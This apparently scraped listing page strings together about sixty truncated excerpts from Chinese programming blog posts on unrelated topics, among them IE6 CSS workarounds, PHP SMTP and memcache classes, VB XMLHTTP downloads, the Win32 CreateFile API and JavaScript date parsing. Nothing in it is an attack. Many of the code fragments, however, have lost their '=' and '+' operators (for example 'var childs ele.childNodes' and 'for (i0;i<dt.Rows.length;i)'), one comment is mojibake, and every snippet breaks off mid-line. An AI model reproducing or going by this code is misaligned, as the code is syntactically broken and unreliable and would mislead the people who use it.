首先必须说的是IE6真得很垃圾,存在太多让人意想不到的bug,但是他主流所以没办法。 1. 首先是position:fixed属性,在ie6中没有这个属性,所以需要在ie6中实现可以有2种方式: a. js方式实现,这样的…
The ESI(Edge Side Includes) language is conceptually similar in many ways to the Server Side Includes (SSI) function found in many web servers. It is an in-markup scripting language that is interpreted before the page is served to the client.
定义和使用类 ST 2是面向对象的语言,在开发过程中当然要创建(定义)和使用类。本文简介了ST2的类系统。如果你想以面向对象的角度理解ST2,那么这篇文章应该是非常有意义的!! 本文整理自http://www.cnblogs.c…
function getchildren(ele,tag){//第一个参数判断if(!(ele&&ele.nodeType1)){throw new Error(第一个参数错误);}var childs ele.childNodes;var a [];//判断参数个数;如是是2个执行if(arguments.length2){//判断第二个参数不是字符串if(typeof tag!string…
简介
这里我们再计算研究区面积的时候出现了一个错误,这里的问题是Line 12: points8.size is not a function 主要问题是xxx不是一个数组或者对象,无法调用size方法。这里的问题是我们要获取这个对象的时候出现了问题,也就说你给函数传输的并不是一个对象,而不知道是什么…
MTK的控件和窗体绘制机制及其事件响应机制(一) 一、entryfunction在文档里面我们看到下面的条款: 以下引自:write applications using pixtel MMI platform.pdfBefore display the new screen over previous screen the f…
一,需要的库函数和头文件 #include <stdlib.h> int rand(void); void srand(unsigned int seed); 二,函数说明 The rand() function returns a pseudo-random integer between 0 and RAND_MAX. The srand() function sets its argument as the se…
AS3.0和AS2.0有了很多变化,以下是“AS3.0:调用SWF文件”的一个例子(其中yanshi是一个按钮): yanshi.addEventListener("click",play_child); function play_child(evt:MouseEvent){ var request:URLReques…
public function decimal f_getrand (decimal ad_begin, decimal ad_end);
//*-----------------------------------------------------------------*///功能,获取两个数之间的随机数//返回值的精确度为两个数中最大精确度//为了使RAND是产生伪随机序列更随即,适当…
pb的replace来用,pb的replace完善正常来说,在一个项目里都会写个全局replace函数,如下$PBExportHeader$gf_replace.srfglobal type gf_replace from function_objectend typeforward prototypesglobal function string gf_replace (ref strin…
法则4:Liskov替换法则(LSP)使用指向基类(超类)的引用的函数,必须能够在不知道具体派生类(子类)对象类型的情况下使用它们。[ Function Thar Use Referennces To Base(Super) Classes…
TWaver提供了一套3D场景的开发包,用来帮助用户快速搭建3D场景,实现3D的监控系统。这个开发包目前商推的只有Flex框架下的版本,被称为TWaver3D for Flex。开发包提供简单的API,用户向TWaver的数据对象(例如Node…
siblings([expr]) 得到所有匹配元素集合中各个元素的所有兄弟元素集合。返回匹配元素集合 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <scrip…
收藏http://www.ajaxbbs.net/test/wz_jsgraphics/index.htm 确实很强大
下来研究研究
JS /* This notice must be untouched at all times.wz_jsgraphics.js v. 3.03
The latest version is available at
http://www.walterzorn.com
or http://www.devira.com
or http://…
源码函数分享GetUrlByXmlHttp XMLHTTP方式下载网页〓〓〓〓〓〓〓〓〓〓GetUrlByXmlHttp函数相关定义声明等 StartPrivate Declare Function GetTickCount Lib "kernel32" () As LongPrivate Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As …
〓〓〓〓〓〓〓〓〓〓OpenSqlServer函数相关定义声明等 StartPublic Conn As New ADODB.ConnectionPublic OpenSqlOK As BooleanPublic ShowSqlRsErr As Boolean〓〓〓〓〓〓〓〓〓〓OpenSqlServer函数相关定义声明等 End┏〓〓〓〓〓〓〓〓〓 OpenSqlServer,start 〓〓〓〓〓〓…
qt 获得xml 节点属性,
The QDomAttr class represents one attribute of a QDomElement. //描绘,(抽象地)表现 2. 象征;表示 3. 作为...的代表 4.
For example, the following piece of XML produces an element with no children, but two attributes: <li…
这篇文章很好,包括5部分,但在网上只找到了第一部分的中文版,只有自己一点一点翻译。本人英语不好,所以将原文也贴上来,翻译不通顺的地方请大家参考。 In this second part of the tutorial on how to build a Sencha T…
经测试 没有问题 <? class smtp { /* Public Variables */ var $smtp_port; var $time_out; var $host_name; var $log_file; var $relay_host; var $debug; var $auth; var $user; var $pass; /* Private Variables */ var $sock; /* Constractor */ function smtp($re…
一.What is upcallThis is typically supportedthrough the use of a registered callback function registered eitherdirectly by the user, or indirectly through the mechanisms of theframework.二.How to use it1.Binding the channel to an eventsource(pIRQ࿰…
这篇文章阐述的是一种函数式编程(functional-programming)设计模式, 我称之为惰性函数定义(Lazy Function Definition)。我不止一次发现这种模式在JavaScript中大有用处,尤其是编写跨浏览器的、高效运行的库…
用Javascript获取指定页面元素的位置是一个非常常见的需求,本文介绍的函数能够准确返回一个元素相对于整个文档左上角的坐标,即元素的 top 、left 的位置,而且能够兼容浏览器,相信对新手非常有用。function getElementPos(element…
<?phpclass User{public $name;public $id;function __construct(){$this->id uniqid(); //give user a unique ID 赋予一个不同的ID}function __sleep(){ return(array("name")); //do not serialize this->name 不串行化name}functio…
建立一个vb工程,Project1添加引用:Microsoft scripting runtime,Microsoft Active Data Object,Microsoft MsXml
Form1代码:Public a As MSXML2.XMLHTTP
Private Sub Command1_Click() Dim d As Class1 Set a New MSXML2.XMLHTTP a.…
<p> <!--#include filefunction/conn.asp-->
<br>
<%
keyWordtrim(request("oKey"))
sTypetrim(request("oType"))
if keyWord"" or keyWord"关键字…" then
Response.Write "请输入关键字࿰…
//1. PHP中出现的字符串Hash函数 static unsigned long hashpjw(char *arKey, unsigned int nKeyLength) { unsigned long h 0, g; char *arEndarKeynKeyLength; while (arKey < arEnd) { h (h << 4) *arKey; if ((g (h & 0xF0000000))) { …
CreateFile函数详解 摘自:http://www.cppblog.com/yishanhante/archive/2009/06/22/19545.html#88298CreateFile
The CreateFile function creates or opens the following objects and returns a handle that can be used to accessthe object: files pipes mail…
<?php# Connect to memcache:global $memcache;$memcache new Memcache;# Gets key / value pair into memcache ... called by mysql_query_cache()function getCache($key) {global $memcache;return ($memcache) ? $memcache->get($key) : false;}# Puts key / val…
最常见的20种VC编译错误信息集合 再网上看到的,大部分都比较常见,对初学者挺有用~~~ 1、fatal error C1010: unexpected end of file while looking for precompiled header directive。 寻找预编译头文件路径时遇到了不该遇到的文件尾。(一般是没有#inc…
PHP code//*******************************************************************//此处构造一个数据库操作类,封装所有数据库操作//可以扩展便于后台管理程序的使用Class MsSQLDB { var $host; var $user; var $passwd; var $database;var $conn; //利用构造函数实…
GetDiskFreeSpaceEx VB声明 Declare Function GetDiskFreeSpaceEx Lib "kernel32" Alias "GetDiskFreeSpaceExA" (ByVal lpRootPathName As String, lpFreeBytesAvailableToCaller As LARGE_INTEGER, lpTotalNumberOfBytes As LARGE_INTEGER, lpTo…
SQL模糊查询 SELECT * FROM user WHERE name LIKE ;%三%; 将会把name为“张三”,“三脚猫”,“唐三藏”等等有“三”的全找出来; 其中LIKE ;%三%明显多了个分号“;”,这还能搜索得出来么?估计是编辑器编译的缘故。 重新…
Mass Storage的实际应用就是U盘,目标板和PC通过USB相连,PC可以把目标板识别为U盘,在很多产品上都很常用。这里介绍一下在WinCE系统中U盘功能的实现。 在谈WinCE的USB Mass Storage实现之前,首先要具备以下条件:
1. 开…
页面:toolTip.jsp
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title>Ajax工具条提示</title> <script type"text/javascript"> var xmlHttp; …
1 sourceinsight screen font 的默认字体是Verdana的,它是一直变宽字体。在Document style中可以将字体改为定宽的Courier 2 勾掉indent Open Brace和Indent Close Brace的效果: 继上一段,在相对缩进行里, 如果输入"{"或"}", …
原文地址为:
cudnn.hpp:127:41: error: too few arguments to function ‘cudnnStatus_t cudnnSetPooling2dDescriptor請注意,本類僅僅是記錄開發過程中遇到對問題,可能會亂貼代碼,亂貼圖,亂貼報錯信息,不保…
原文地址为:
插件8:拼写检查<?php // Plug-in 8: Spell Check// This is an executable example with additional code supplied
// To obtain just the plug-ins please click on the Download link$text "It was the best of tmes, it was t…
笔者在开发某软件过程中遇到这样一个问题,前级模块传给我二进制数据,输入参数为 char* buffer和 int length,buffer是数据的首地址,length表示这批数据的长度。数据的特点是:长度不定,类型不定,…
有分类表tb_system_category,结构如下: CREATE TABLE tb_system_category (id int(11) NOT NULL AUTO_INCREMENT,c_parent_id int(11) NOT NULL,c_name varchar(50) NOT NULL,c_full_name varchar(200) DEFAULT NULL,c_code varchar(50) NOT NULL,c_desc…
一、字符串转化为时间并比较
第一种适用于:20100823这种字符串格式 function dateValid(){ var bd document.getElementByIdx_x_x("sStartSaveDate").value; var beginDate new Date(bd.replace(/^(\d{4})(\d{2})(\d{2})$/,"$1/$2/$3")); va…
转自http://www.why100000.com/_articles/show_a_article.asp?autoid76&tabtabWindows AD简介 Active Directory(以下简称AD)可以认为是一个大的层次结构数据库,集中存储的内容必须遵循AD当前所定义的Schema。我觉得AD中最重要的内容就是…
使用function THUSRINFO,即可获取。 DATA: OPCODE TYPE X.REFRESH USR_TABL.OPCODE 2.CALL ThUsrInfo ID OPCODE FIELD OPCODE ID TAB FIELD USR_TABL-*SYS*. 调用的是系统标准功能,为C语言实现的。
usb作为一种串行接口,应用日益广泛。如同每个工程设计人员必须掌握I2C,RS232这些接口一样,我们也必须掌握usb.
但是usb的接口协议实在有点费解,linux uhci驱动作者之一Alan Stern曾经就说过“The USB documentation is downright evil. Most…
做这个导航栏的初衷,是想在公司产品的后台界面里,模仿MAC OS X系统的dock效果,所谓dock,就是OS X桌面底部那条显眼的工具栏,我的UBUNTU桌面里也有类似的效果…… 实际上我也没用过MAC,所以是凭想象做的&…
TO_DATE格式复制内容到剪贴板代码:Day:dd number 12dy abbreviated friday spelled out fridayddspth spelled out, ordinal twelfthMonth:mm number 03mon abbreviated marmonth spelled out marchYear:yy two digits 98yyyy four digits 199824小时格式下时间范围为ÿ…
<!
DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
><
HTML
><
HEAD
><
TITLE
>俄罗斯方块
</
TITLE
><
META
NAME
"Generator"CONTENT
"EditPlus"
><
META
NAME
"Author"CO…
<script> //SCRIPTStart var gnPicNum 4; var gnBtnNum 6; var imgPause new Array(); var imgPlay new Array(); var imgStop new Array(); var imgPrev new Array(); var imgNext new Array(); var imgFull new Array();//涓嶈兘鍦ㄨ繖閲岀敤鍙橀噺鎸囧畾array…
JS常用方法 以下为web开发中常用到的js方法;收集并整理出来;简单的就不写出来了 1<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2<HTML> 3<HEAD> 4<TITLE> New Document </TITLE> 5&…
把CODE列的内容变成超链接function FillGrid_CallBack(response)
{ var dsresponse.value; //ds is a DataSet var dtds.Tables[0]; var gridigtbl_getGridById("<%gdUserInfoSearch.ClientID%>"); var i,j,s; for (i0;i<dt.Rows.length;i) { grid.Rows.ad…
作者 Mark Tarquin Wilton-Jones 2006年11月2日
本文翻译自 Efficient JavaScript
传统上,网页中不会有大量的脚本,至少脚本很少会影响网页的性能。但随着网页越来越像 Web 应用程序,脚本的效率对网页性能影响越来越大。而且使用 Web 技术…
预览广告,点击一下显示,在点击隐藏<script>
function showframe(id){if( document.getElementById("picframe_"id).style.display"none"){document.getElementById("picframe_"id).style.display"";}else{docum…
1 DnsFree FunctionThe DnsFree function frees memory allocated for DNS records that was obtained using the DnsQuery function. 函数原型定义:void WINAPI DnsFree(__inout PVOID pData,__in DNS_FREE_TYPE FreeType); Parameters pData A pointer to the DNS dat…
void CTestDlg::ShowInfo(CString str, int code)
{m_ListInfo.InsertString(m_ListInfo.GetCount(),str);m_ListInfo.SetCurSel(m_ListInfo.GetCount()-1);
}如上所示: m_ListInfo为继承自CListBox的列表框: class CTestListBox : public CListBox
{
// Construction
public:C…
此示例代码主要用来示范如何在LINQ to SQL的对象模型中生成映射到SQL用户定义的标量值函数的函数。SQL Server的标量值函数通常类似与如下的定义:CREATE FUNCTION ReverseCustName(CustomerID nchar(5))RETURNS nvarchar(30)ASBEGINDECLARE CustomerName nvarchar(3…
AutoComplete控件就是在用户在文本框中输入前几个字母或是汉字的时候,该控件就能从存放数据的文本或是数据库里将所有以这些字母开头的数据提示给用户,供用户选择,提供方便。
autocomplete(url or data,[options])
利用这个函数可以让一个输…
error: stray ‘\302’ in program For those who have already encountered this error “error: stray ‘\302’ in program” or something similar while compiling a program in C : foollocalhost:~$ gcc -o hello_world hello_world.c
hello_world.c: In function ‘ma…
我在RSS阅读器设计过程中的XML解析时遇到标签之间的文本是如下的格式: <![CDATA[我是文本]]>。 说实话我不是很大清楚这样一个表达式的作用,因此就查看了网上的说法,以下内容摘自W3School。 XML CDATA 所有 XML 文档中的文本均会被解析…
new Date(2003,2,0).getDate() 当月最后一天var datePattern /^(/d{4})-(/d{1,2})-(/d{1,2})$/;
if (!datePattern.test(strDate))
{window.alert("请填写正确的 开始日期格式");return false;
}var d1 new Date(strDate1.replace(/-/g, "/"));
var d2 …